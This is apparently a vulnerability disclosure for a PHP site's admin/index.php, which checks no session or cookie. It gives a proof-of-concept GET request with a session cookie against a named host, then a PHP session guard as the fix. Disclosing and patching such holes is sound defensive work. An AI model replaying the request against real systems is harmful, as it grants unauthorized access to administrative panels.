admin/index.php There is no authentication check on the cookie or session or header, resulting in unauthorized access
admin/index.php
```php
<?php session_start(); ?>
..........
..........
..........
<?php
//success message
if(isset($_POST['success'])) {
    $success = $_POST["success"];
    echo "<h1 style='color:#0C0'>Your Product was added successfully <span class='glyphicon glyphicon-ok'></h1></span>";
}
?></h3>
</div>
</div></div></div>
<?php include("include/js.php"); ?>
</body>
</html>
```
```http
GET /admin/ HTTP/1.1
Host: www.onsp.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=acrlvk4ljcqdujn2orbd09in25
Upgrade-Insecure-Requests: 1
```
Vulnerability file address
admin/index.php
There is no authentication check on the cookie or session or header, resulting in unauthorized access

POC
Attack results pictures
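
One way to close the gap reported here, as an added example that is not the project's own code: the `admin/index.php` excerpt calls `session_start()` but never inspects `$_SESSION`, so any request reaches the admin markup. The guard below is meant to be the first statement of every admin page; the file name, session keys, login URL and idle limit are assumptions.

```php
<?php
// Hypothetical file: admin/include/auth_guard.php (name is an assumption).
// require_once this before any output in every admin page, admin/index.php included.
declare(strict_types=1);

// Assumed names: the session keys and login page are not taken from the project.
const ADMIN_SESSION_KEY = 'admin_user_id';
const ADMIN_LAST_SEEN   = 'admin_last_seen';
const ADMIN_LOGIN_URL   = '/admin/login.php';
const ADMIN_IDLE_LIMIT  = 1800; // seconds of inactivity before re-login

function admin_session_is_valid(array $session, int $now): bool
{
    // A bare PHPSESSID cookie is not proof of login: the session must carry
    // an identity that the login handler stored after verifying credentials.
    if (empty($session[ADMIN_SESSION_KEY])) {
        return false;
    }
    // Reject sessions that have been idle for too long.
    $last = $session[ADMIN_LAST_SEEN] ?? 0;
    return is_int($last) && ($now - $last) <= ADMIN_IDLE_LIMIT;
}

function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_set_cookie_params([
            'httponly' => true,
            'secure'   => true,  // assumes the admin area is served over HTTPS
            'samesite' => 'Lax',
        ]);
        session_start();
    }

    if (!admin_session_is_valid($_SESSION, time())) {
        // Discard the session state and stop before any admin markup is sent.
        $_SESSION = [];
        session_destroy();
        header('Location: ' . ADMIN_LOGIN_URL, true, 302);
        exit;
    }

    $_SESSION[ADMIN_LAST_SEEN] = time();
}

require_admin();
```

The login handler has to call `session_regenerate_id(true)` and set both session keys only after the password check succeeds. With the guard in place, a request like the `GET /admin/` above that carries only a fresh `PHPSESSID` receives a 302 to the login page instead of the admin HTML.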